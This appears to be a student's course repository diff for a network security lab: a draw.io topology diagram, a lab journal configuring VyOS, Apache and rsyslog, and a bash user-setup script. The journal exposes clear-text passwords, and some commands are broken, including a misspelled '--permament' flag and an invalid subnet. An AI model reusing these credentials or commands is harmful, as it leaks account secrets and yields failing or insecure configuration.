<mxCell id="WV4KZU-K2HEF4Ivt-XvY-29" value="sec350.cyber.local&lt;div&gt;10.0.17.100&lt;/div&gt;" style="image;points=[];aspect=fixed;html=1;align=center;shadow=0;dashed=0;image=img/lib/allied_telesis/computer_and_terminals/Server_Desktop.svg;" parent="1" vertex="1">
<mxGeometry x="443.99" y="364" width="56.01" height="71" as="geometry" />
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-30" value="" style="endArrow=none;html=1;rounded=0;entryX=0;entryY=1;entryDx=0;entryDy=0;exitX=0.417;exitY=0.031;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-29" target="WV4KZU-K2HEF4Ivt-XvY-25" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="620" y="470" as="sourcePoint" />
<mxPoint x="670" y="420" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-31" value="port forwarding" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];rotation=90;" parent="WV4KZU-K2HEF4Ivt-XvY-30" vertex="1" connectable="0">
<mxGeometry x="-0.27" y="1" relative="1" as="geometry">
<mxPoint x="-7" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-32" value="" style="endArrow=none;html=1;rounded=0;exitX=0;exitY=0.5;exitDx=0;exitDy=0;entryX=1.006;entryY=0.471;entryDx=0;entryDy=0;entryPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-5" target="WV4KZU-K2HEF4Ivt-XvY-29" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="570" y="440" as="sourcePoint" />
<mxPoint x="410" y="380" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-33" value="" style="endArrow=none;html=1;rounded=0;entryX=1;entryY=0.965;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.49;exitY=-0.035;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-5" target="WV4KZU-K2HEF4Ivt-XvY-25" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="600" y="310" as="sourcePoint" />
<mxPoint x="650" y="260" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-34" value="10.0.17.2" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" parent="WV4KZU-K2HEF4Ivt-XvY-33" vertex="1" connectable="0">
<mxGeometry x="0.7364" y="-1" relative="1" as="geometry">
<mxPoint x="8" y="8" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-1" value="RW01&lt;div&gt;10.0.17.51&lt;/div&gt;" style="shape=image;html=1;verticalAlign=top;verticalLabelPosition=bottom;labelBackgroundColor=#ffffff;imageAspect=0;aspect=fixed;image=https://cdn1.iconfinder.com/data/icons/operating-system-flat-1/30/ubuntu-128.png;clipPath=inset(10.94% 10.94% 10.94% 10.94%);" parent="1" vertex="1">
<mxGeometry x="950" y="360" width="60" height="60" as="geometry" />
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-4" value="MGMT 172.16.2000.0/28" style="rounded=1;whiteSpace=wrap;html=1;align=center;" parent="1" vertex="1">
<mxGeometry x="782" y="970" width="340" height="40" as="geometry" />
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-5" value="" style="endArrow=none;html=1;rounded=0;fontSize=12;startSize=8;endSize=8;curved=1;entryX=0.121;entryY=1.05;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.5;exitY=0;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="JkLcdCIDIRtKrtIc7PYW-6" target="WV4KZU-K2HEF4Ivt-XvY-7" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="846" y="800" as="sourcePoint" />
<mxPoint x="1034" y="830" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-17" value="&lt;div&gt;172.16.150.3&lt;/div&gt;eth0" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];fontSize=12;" parent="JkLcdCIDIRtKrtIc7PYW-5" vertex="1" connectable="0">
<mxGeometry x="-0.5172" y="-1" relative="1" as="geometry">
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-9" value="" style="endArrow=none;html=1;rounded=0;fontSize=12;startSize=8;endSize=8;curved=1;exitX=0.5;exitY=1;exitDx=0;exitDy=0;exitPerimeter=0;entryX=0.103;entryY=0.05;entryDx=0;entryDy=0;entryPerimeter=0;" parent="1" source="JkLcdCIDIRtKrtIc7PYW-6" target="JkLcdCIDIRtKrtIc7PYW-4" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="984" y="880" as="sourcePoint" />
<mxPoint x="1034" y="830" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-18" value="172.16.200.2&lt;div&gt;eth1&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];fontSize=12;" parent="JkLcdCIDIRtKrtIc7PYW-9" vertex="1" connectable="0">
<mxGeometry x="-0.2728" y="1" relative="1" as="geometry">
<mxPoint x="-1" y="8" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-11" value="wazuh&lt;div&gt;172.16.200.10&lt;/div&gt;" style="shape=image;html=1;verticalAlign=top;verticalLabelPosition=bottom;labelBackgroundColor=#ffffff;imageAspect=0;aspect=fixed;image=https://cdn1.iconfinder.com/data/icons/logos-brands-1/24/logo_brand_brands_logos_ubuntu-128.png" parent="1" vertex="1">
<mxGeometry x="782" y="1070" width="60" height="60" as="geometry" />
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-12" value="MGMT02&lt;div&gt;172.16.200.11&lt;/div&gt;" style="sketch=0;aspect=fixed;pointerEvents=1;shadow=0;dashed=0;html=1;strokeColor=none;labelPosition=center;verticalLabelPosition=bottom;verticalAlign=top;align=center;fillColor=#00188D;shape=mxgraph.mscae.enterprise.windows_server" parent="1" vertex="1">
<mxGeometry x="940" y="1070" width="39" height="50" as="geometry" />
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-15" value="" style="endArrow=none;html=1;rounded=0;fontSize=12;startSize=8;endSize=8;curved=1;entryX=0.5;entryY=1;entryDx=0;entryDy=0;exitX=0.308;exitY=0.12;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="JkLcdCIDIRtKrtIc7PYW-12" target="JkLcdCIDIRtKrtIc7PYW-4" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="984" y="1000" as="sourcePoint" />
<mxPoint x="1034" y="950" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-16" value="" style="endArrow=none;html=1;rounded=0;fontSize=12;startSize=8;endSize=8;curved=1;entryX=0.107;entryY=1.038;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.5;exitY=0;exitDx=0;exitDy=0;" parent="1" source="JkLcdCIDIRtKrtIc7PYW-11" target="JkLcdCIDIRtKrtIc7PYW-4" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="984" y="1000" as="sourcePoint" />
<mxPoint x="1034" y="950" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-4" value="&lt;div&gt;ANY &amp;gt; 172.16.50.3:80&lt;/div&gt;&lt;div&gt;172.16.150.10:22 &amp;gt; ANY:22&lt;/div&gt;" style="shape=flexArrow;endArrow=classic;html=1;rounded=0;endSize=15.103448275862068;strokeWidth=1;sourcePerimeterSpacing=0;startSize=6;width=34.48275862068966;" parent="1" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="720" y="640" as="sourcePoint" />
<mxPoint x="540" y="640" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-7" value="ANY &gt; 172.16.200.10:1514,1515" style="shape=flexArrow;endArrow=classic;rounded=0;width=24.137931034482758;endSize=9.379310344827585;" parent="1" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="550" y="680" as="sourcePoint" />
<mxPoint x="740" y="680" as="targetPoint" />
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-12" value="ANY:80 &gt; 172.16.50.3:80" style="shape=flexArrow;endArrow=classic;rounded=0;endSize=11.33;strokeWidth=1;sourcePerimeterSpacing=0;startSize=6;width=28;horizontal=1;labelBackgroundColor=default;" parent="1" edge="1">
<mxGeometry x="-0.1119" y="-8" width="50" height="50" relative="1" as="geometry">
<mxPoint x="575" y="441.6" as="sourcePoint" />
<mxPoint x="489" y="561.6" as="targetPoint" />
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-15" value="&lt;div&gt;ANY &amp;gt; ANY&lt;/div&gt;&lt;div&gt;No restrictions&lt;br&gt;&lt;/div&gt;" style="shape=flexArrow;endArrow=classic;html=1;rounded=0;endSize=15.019354838709678;strokeWidth=1;sourcePerimeterSpacing=0;startSize=6;width=20;" parent="1" edge="1">
<mxGeometry x="-0.2319" width="50" height="50" relative="1" as="geometry">
<mxPoint x="910" y="580" as="sourcePoint" />
<mxPoint x="883" y="450" as="targetPoint" />
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-19" value="FW01 default policy:&#xa;DROP with logging&#xa;Established connections allowed " style="rounded=0;whiteSpace=wrap;fontSize=10;verticalAlign=middle;" parent="1" vertex="1">
<mxGeometry x="700" y="480" width="151" height="70" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-20" value="" style="endArrow=none;html=1;rounded=0;entryX=0;entryY=0.5;entryDx=0;entryDy=0;exitX=1;exitY=0.5;exitDx=0;exitDy=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-5" target="JkLcdCIDIRtKrtIc7PYW-1" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="730" y="490" as="sourcePoint" />
<mxPoint x="780" y="440" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-23" value="FW-MGMT default policy:&#xa;DROP with logging&#xa;Established connections allowed " style="rounded=0;whiteSpace=wrap;fontSize=10;verticalAlign=middle;" parent="1" vertex="1">
<mxGeometry x="631" y="790" width="151" height="70" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-25" value="" style="shape=flexArrow;endArrow=classic;html=1;rounded=0;width=19.25925925925926;endSize=11.2;" parent="1" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="940" y="680" as="sourcePoint" />
<mxPoint x="950" y="846" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-26" value="&lt;div&gt;172.16.150.10:22 &amp;gt; 172.16.200.10:22&lt;br&gt;&lt;/div&gt;&lt;div&gt;172.16.150.10:443 &amp;gt; 172.16.200.10:443&lt;/div&gt;ANY &amp;gt; 172.16.200.10:1514,1515" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" parent="8yr2mNF9FMK26sW0gYA2-25" vertex="1" connectable="0">
<mxGeometry x="-0.1287" y="2" relative="1" as="geometry">
<mxPoint x="24" y="-2" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-28" value="" style="shape=flexArrow;endArrow=classic;html=1;rounded=0;width=13.793103448275863;endSize=7.63448275862069;" parent="1" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="920" y="950" as="sourcePoint" />
<mxPoint x="900" y="790" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-29" value="&lt;div&gt;ANY &amp;gt; 172.16.150.0/24&lt;/div&gt;&lt;div&gt;ANY &amp;gt; 172.16.50.0/29&lt;br&gt;&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" parent="8yr2mNF9FMK26sW0gYA2-28" vertex="1" connectable="0">
<mxGeometry x="-0.0417" y="-7" relative="1" as="geometry">
<mxPoint x="23" y="18" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-31" value="&lt;div&gt;&lt;br&gt;&lt;/div&gt;" style="shape=umlActor;verticalLabelPosition=bottom;verticalAlign=top;html=1;outlineConnect=0;" parent="1" vertex="1">
<mxGeometry x="1115" y="200" width="50" height="80" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-33" value="" style="endArrow=none;html=1;rounded=0;exitX=0.612;exitY=-0.033;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-7" target="JkLcdCIDIRtKrtIc7PYW-2" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="970" y="590" as="sourcePoint" />
<mxPoint x="1020" y="540" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-34" value="" style="endArrow=none;html=1;rounded=0;exitX=0.882;exitY=-0.005;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-7" target="JkLcdCIDIRtKrtIc7PYW-3" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="1020" y="570" as="sourcePoint" />
<mxPoint x="1070" y="520" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-36" value="" style="endArrow=none;html=1;rounded=0;" parent="1" source="8yr2mNF9FMK26sW0gYA2-35" target="8yr2mNF9FMK26sW0gYA2-31" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="1090" y="430" as="sourcePoint" />
<mxPoint x="1140" y="380" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-37" value="" style="endArrow=none;html=1;rounded=0;entryX=0.5;entryY=0;entryDx=0;entryDy=0;" parent="1" source="8yr2mNF9FMK26sW0gYA2-35" target="JkLcdCIDIRtKrtIc7PYW-3" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="1090" y="430" as="sourcePoint" />
<mxPoint x="1140" y="380" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-35" value="&lt;div&gt;Access via&lt;/div&gt;&lt;div&gt;Chrome Remote Desktop&lt;br&gt;&lt;/div&gt;" style="dashed=0;outlineConnect=0;html=1;align=center;labelPosition=center;verticalLabelPosition=bottom;verticalAlign=top;shape=mxgraph.weblogos.chrome;labelBackgroundColor=default;" parent="1" vertex="1">
<mxGeometry x="1110" y="364" width="60" height="60" as="geometry" />
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-6" value="&lt;span&gt;FW-MGMT&lt;/span&gt;" style="outlineConnect=0;dashed=0;verticalLabelPosition=bottom;verticalAlign=top;align=center;html=1;shape=mxgraph.aws3.router;fillColor=#F58534;gradientColor=none;labelBackgroundColor=#FFFFFF;" parent="1" vertex="1">
<mxGeometry x="782" y="753" width="69" height="72" as="geometry" />
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-2" value="wks01&lt;div&gt;172.16.150.50&lt;/div&gt;" style="image;sketch=0;aspect=fixed;html=1;points=[];align=center;fontSize=12;image=img/lib/mscae/VirtualMachineWindows.svg;" parent="1" vertex="1">
<mxGeometry x="980" y="515.6" width="50" height="46" as="geometry" />
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-3" value="mgmt01&lt;div&gt;172.16.150.10&lt;/div&gt;" style="shape=image;html=1;verticalAlign=top;verticalLabelPosition=bottom;labelBackgroundColor=#ffffff;imageAspect=0;aspect=fixed;image=https://cdn1.iconfinder.com/data/icons/operating-system-flat-1/30/ubuntu-128.png" parent="1" vertex="1">
<mxGeometry x="1080" y="502.6" width="70" height="70" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-38" value="&lt;div&gt;&lt;font style=&quot;font-size: 18px;&quot;&gt;SEC 350 -&amp;nbsp; Network Security Controls&lt;/font&gt;&lt;/div&gt;&lt;div&gt;&lt;font style=&quot;&quot;&gt;&lt;font style=&quot;font-size: 18px;&quot;&gt;Network Diagram - Charlotte Croce&lt;/font&gt;&lt;font style=&quot;font-size: 16px;&quot;&gt;&lt;br&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;&lt;div&gt;&lt;font style=&quot;&quot;&gt;&lt;font style=&quot;font-size: 18px;&quot;&gt;PRIOR TO MIDTERM&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;" style="rounded=0;whiteSpace=wrap;html=1;" parent="1" vertex="1">
<mxGeometry x="654" y="130" width="356" height="100" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-44" value="" style="shape=image;verticalLabelPosition=bottom;labelBackgroundColor=default;verticalAlign=top;aspect=fixed;imageAspect=0;image=https://wazuh.com/uploads/2022/05/wazuh-logo.png;" parent="1" vertex="1">
<mxGeometry x="820.66" y="1040" width="89.68" height="30" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-46" value="WEB01&#xa;172.16.50.3" style="shape=image;verticalLabelPosition=bottom;labelBackgroundColor=default;verticalAlign=top;aspect=fixed;imageAspect=0;image=https://static-00.iconduck.com/assets.00/centos-icon-2048x2048-39pfdqnc.png;" parent="1" vertex="1">
<mxGeometry x="160" y="687.5" width="90" height="90" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-47" value="" style="shape=image;verticalLabelPosition=bottom;labelBackgroundColor=default;verticalAlign=top;aspect=fixed;imageAspect=0;image=https://www.apache.org/foundation/press/kit/feather.png;" parent="1" vertex="1">
<mxGeometry x="250" y="687.5" width="56.58" height="100" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-48" value="access via vSphere" style="shape=image;verticalLabelPosition=bottom;labelBackgroundColor=default;verticalAlign=top;aspect=fixed;imageAspect=0;image=https://raw.githubusercontent.com/pulumiverse/pulumi-esxi-native/main/docs/esxi-logo.png;clipPath=inset(3% 4.33% 5% 2%);" parent="1" vertex="1">
<mxGeometry x="320" y="215.71" width="69.82" height="68.58" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-51" value="" style="endArrow=none;html=1;rounded=0;entryX=0;entryY=1;entryDx=0;entryDy=0;exitX=1;exitY=0.5;exitDx=0;exitDy=0;" parent="1" source="8yr2mNF9FMK26sW0gYA2-48" target="WV4KZU-K2HEF4Ivt-XvY-25" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="490" y="330" as="sourcePoint" />
<mxPoint x="540" y="280" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-52" value="" style="endArrow=none;html=1;rounded=0;entryX=0.75;entryY=1;entryDx=0;entryDy=0;exitX=0.5;exitY=0;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-18" target="WV4KZU-K2HEF4Ivt-XvY-8" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="470" y="700" as="sourcePoint" />
<mxPoint x="520" y="650" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="DTbgnu_EpuIW3-PPX9BY-1" value="Text" style="text;strokeColor=none;align=center;fillColor=none;html=1;verticalAlign=middle;whiteSpace=wrap;rounded=0;" parent="1" vertex="1">
<mxGeometry x="570" y="500" width="60" height="30" as="geometry" />
</mxCell>
<mxCell id="DTbgnu_EpuIW3-PPX9BY-2" value="&lt;div&gt;&lt;font style=&quot;font-size: 8px;&quot;&gt;DELETED IN FAVOR OF NAT DESTINATION RULE&lt;/font&gt;&lt;/div&gt;&lt;font style=&quot;font-size: 8px;&quot;&gt;route 172.16.50.0/29 via 10.0.17.151&lt;/font&gt;" style="rounded=1;whiteSpace=wrap;html=1;" parent="1" vertex="1">
<mxGeometry x="960" y="300" width="115" height="64" as="geometry" />
</mxCell>
<mxCell id="DTbgnu_EpuIW3-PPX9BY-3" value="" style="shape=image;verticalLabelPosition=bottom;labelBackgroundColor=default;verticalAlign=top;aspect=fixed;imageAspect=0;image=https://modsecurity.org/img/social-share.png;" parent="1" vertex="1">
<mxGeometry x="234.96" y="767.39" width="86.67" height="22.61" as="geometry" />
</mxCell>
<mxCell id="DTbgnu_EpuIW3-PPX9BY-4" value="" style="endArrow=classic;html=1;rounded=0;dashed=1;" parent="1" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="250" y="800" as="sourcePoint" />
<mxPoint x="770" y="1080" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="1T3fPST5dwJRFvFpHEdL-1" value="" style="endArrow=classic;html=1;rounded=0;" edge="1" parent="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="640" y="490" as="sourcePoint" />
<mxPoint x="580" y="470" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="1T3fPST5dwJRFvFpHEdL-2" value="&lt;font style=&quot;font-size: 8px;&quot;&gt;PF :80&lt;/font&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" vertex="1" connectable="0" parent="1T3fPST5dwJRFvFpHEdL-1">
<mxGeometry x="0.0469" y="3" relative="1" as="geometry">
<mxPoint x="2" y="-2" as="offset" />
</mxGeometry>
</mxCell>
</root>
</mxGraphModel>
</diagram>
</mxfile>
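Review bot: cell `DTbgnu_EpuIW3-PPX9BY-1` (geometry x=570, y=500) still carries draw.io's default placeholder label "Text" and has no connections, so a stray "Text" box renders next to the router; delete it or give it its intended label. Also, edge `1T3fPST5dwJRFvFpHEdL-1` (the one carrying the "PF :80" label) has no `source` or `target` attribute, only fixed `sourcePoint`/`targetPoint` coordinates, so it will not follow the shapes it is meant to connect if they are moved.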


View file

@ -0,0 +1,121 @@
# Lab 1.1, Routing and DMZ
## Configuring rw01
- changing the champuser password: `password123!`
- set hostname to `rw01-charlotte`([reference](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/sysadmin-i-sys255/lab03-linux.md#set-hostname))
- add sudo user `charlotte:password123!` ([reference](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/sysadmin-i-sys255/lab03-linux.md#creating-privileged-user))
- Make sure you have a static ip that matches the one in the IP assignments spreadsheet: use **nmtui**, set IP to `10.0.17.51/24` and gateway/DNS to `10.0.17.2` \
![image](../../../assets/46252357-1387-45bd-a4ae-ede9e12417c9.png)
## fw01, gateway/router/firewall ([VyOS doc](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/vyos.md))
![image](../../../assets/723c16dc-f130-4f61-9508-b0fe70adbca5.png) \
default creds: `vyoz:Ch@mpla1n!22`
### set hostname
```
configure
set system host-name fw01-charlotte
commit
save
```
Repeat exit until you get to a login prompt. Then you should see your new hostname, so go ahead and log in back to configure.
### configure interfaces
```
configure
set interfaces ethernet eth0 description SEC350-WAN
set interfaces ethernet eth1 description CHARLOTTE-DMZ
set interfaces ethernet eth2 description CHARLOTTE-LAN
set interfaces ethernet eth0 address 10.0.17.151/24
set interfaces ethernet eth1 address 172.16.50.2/29
set interfaces ethernet eth2 address 172.16.150.2/24
commit
save
```
![image](../../../assets/2a546cc0-a012-48b3-bfc8-3884334decfa.png)
### configure gateway & DNS
```
configure
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set system name-server 10.0.17.2
commit
save
```
### Configuring NAT and DNS Forwarding for DMZ
```
configure
set nat source rule 10 description "NAT FROM DMZ to WAN"
set nat source rule 10 outbound-interface eth0
set nat source rule 10 source address 172.16.50.0/29
set nat source rule 10 translation address masquerade
set service dns forwarding listen-address 172.16.50.2
set service dns forwarding allow-from 172.16.50.0/29
set service dns forwarding system
commit
save
```
![image](../../../assets/2fe9dd01-e8e0-48c6-86a0-6f41fba39886.png)
## web01, web server
### basics
- Set adapter to DMZ: \
![image](../../../assets/a2abea31-7eb8-486a-b563-3962d086ab44.png) \
default creds: `root:Ch@mpl@1n!22`
- set hostname to `web01-charlotte`([reference](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/sysadmin-i-sys255/lab03-linux.md#set-hostname))
- add sudo user `charlotte:password123!` ([reference](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/sysadmin-i-sys255/lab03-linux.md#creating-privileged-user))
- `nmtui` \
![image](../../../assets/c69680f9-be75-4b5e-976b-cf6b508f6553.png) \
![image](../../../assets/06fa4ee7-ce28-40d2-8193-3f84b03b41d1.png)
### configure httpd
- install httpd ([reference](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/sysadmin-i-sys255/lab08-apache.md#install-httpd))
### on rw01, testing web service
- any address in your DMZ should route via fw01s WAN interface. We do this with a static route on rw01
- anything addressed to the 172.16.50.0/29 network will go through the 10.0.17.151 router
```
sudo ip route add 172.16.50.0/29 via 10.0.17.151
sudo systemctl restart NetworkManager
traceroute 172.16.50.3
```
## log01, rsyslog server
log01 will be initially in the DMZ, later we will change this to a segmented network area
### basics
![image](../../../assets/b7112a43-e0e0-4d8c-af36-a7a925ccc1d8.png)
- set hostname to `log01-charlotte`([reference](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/sysadmin-i-sys255/lab03-linux.md#set-hostname))
- add sudo user `charlotte:password123!` ([reference](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/sysadmin-i-sys255/lab03-linux.md#creating-privileged-user))
### rsyslog setup
![image](../../../assets/4b9ac768-72f6-4ef4-92ed-5be231e63c7b.png) \
![image](../../../assets/cd26c18f-74b8-481c-bc37-8c602f7f46c7.png)
allow UDP and TCP 514 for syslog traffic
```
sudo firewall-cmd --add-port=514/tcp --permament
sudo firewall-cmd --add-port=514/udp --permament
sudo firewall-cmd --reload
```
![image](../../../assets/62b95926-6b2a-42e2-a12f-610b1a3336b8.png)
On log01, the `/etc/rsyslog.conf` file needs to be modified to receive syslog messages over ports 514 tcp and udp. Uncomment the appropriate lines (see below) and restart the rsyslog service.
![image](../../../assets/48994d9b-0f17-4626-ab9d-985d37c5e506.png) \
![image](../../../assets/b7c9efbf-0819-4381-99f7-14826220bb8a.png)
### on web01, configure log forwarding to log01
- `sudo yum install rsyslog`
- Create the following file: `/etc/rsyslog.d/sec350.conf` and restart rsyslog on web01
![image](../../../assets/143d58a5-5713-4425-b1d5-d8f9dcf63cf0.png)
- monitor incoming logs on log01: `tail -f /var/log/messages`
- create test log on web01: `logger -t test TESTFROMWEB01TOLOG01`
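Review bot: both `firewall-cmd` lines under "rsyslog setup" misspell the flag as `--permament`; firewall-cmd rejects the unknown option, so neither `514/tcp` nor `514/udp` is opened, let alone persisted across `--reload`. The lines should read `sudo firewall-cmd --add-port=514/tcp --permanent` and `sudo firewall-cmd --add-port=514/udp --permanent`. Separately, the journal commits working credentials in clear text (`password123!`, the `vyoz` and `root` default passwords); since the repository is public, the accounts on any VM that is still running should be rotated and the values in the text replaced with placeholders.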

View file

@ -0,0 +1,65 @@
#!/bin/bash
# script to streamline basic linux setup
function sethostname(){
if [ -z "$1" ]; then # if no arg (using menu), prompt user
echo "current hostname: " $(hostname)
echo -n "new hostname (<ENTER> to skip): "
read newhostname
if [ -z ${newhostname} ]; then
return 0
fi
echo "...'hostnamectl set-hostname ${newhostname}'"
hostnamectl set-hostname ${newhostname}
else # if arg provided, set hostname to arg
hostnamectl set-hostname $1
fi
echo "current hostname: " $(hostname)
}
function addsudouser(){
if [ -z $2 ]; then
echo -n "username: "
read username
echo -n "password: "
read password
echo "...adduser ${username}"
adduser ${username}
echo "...echo ${password} | passwd ${username} --stdin"
echo ${password} | passwd ${username} --stdin
echo "...'usermod -aG sudo ${username}"
usermod -aG sudo ${username}
fi
}
# privilege check. this script has to be run as root (sudo)
user=$(whoami)
if [[ "$user" != "root" ]]; then
echo "please run as root. exiting..."
exit 0
fi
# interactive menu
while :
do
echo "PLease select an option:"
echo "[1] Set Hostname"
echo "[2] create user"
echo "[7] Quit"
echo -n "> "
read userInput
echo ""
if [[ "$userInput" == "1" ]]; then
sethostname
elif [[ "$userInput" == "2" ]]; then
addsudouser
elif [[ "$userInput" == "7" ]]; then
echo "Exiting,,."
break
fi
done
